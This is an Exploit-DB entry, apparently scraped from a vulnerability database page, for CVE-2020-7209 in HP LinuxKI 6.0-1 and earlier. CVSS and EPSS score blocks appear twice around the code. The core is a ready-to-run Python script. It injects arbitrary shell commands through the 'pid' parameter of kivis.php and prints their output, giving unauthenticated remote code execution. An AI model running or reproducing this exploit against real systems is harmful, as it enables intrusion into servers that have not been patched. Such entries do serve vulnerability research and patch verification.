Lucene search

K
exploitdbCody WinklerEDB-ID:48483
HistoryMay 18, 2020 - 12:00 a.m.

HP LinuxKI 6.01 - Remote Command Injection

2020-05-1800:00:00
Cody Winkler
www.exploit-db.com
752

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.972 High

EPSS

Percentile

99.8%

Exploit Title: HP LinuxKI 6.01 - Remote Command Injection
Date: 2020-05-17
Exploit Author: Cody Winkler
Vendor Homepage: https://www.hpe.com/us/en/home.html
Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1
Version: <= v6.0-1
Tested on: LinuxKI Docker Image
CVE: CVE-2020-7209

#!/usr/bin/env python3

import requests
import argparse
import sys
import re

def parse_options():

	formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
	parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter)
	parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True)
	parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True)
	parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True)
	args = parser.parse_args()
	return args

def main(args):

	host = args.host
	port = args.port
	cmd = args.cmd
	path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd
	rce = requests.get('http://' + host + ':' + port + path, verify=False)
	output = rce.text
	a, b = output.find('BEGIN'), output.find('END')
	print(output[a+6:b])

if __name__ in "__main__":
	args = parse_options()
	main(args)

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.972 High

EPSS

Percentile

99.8%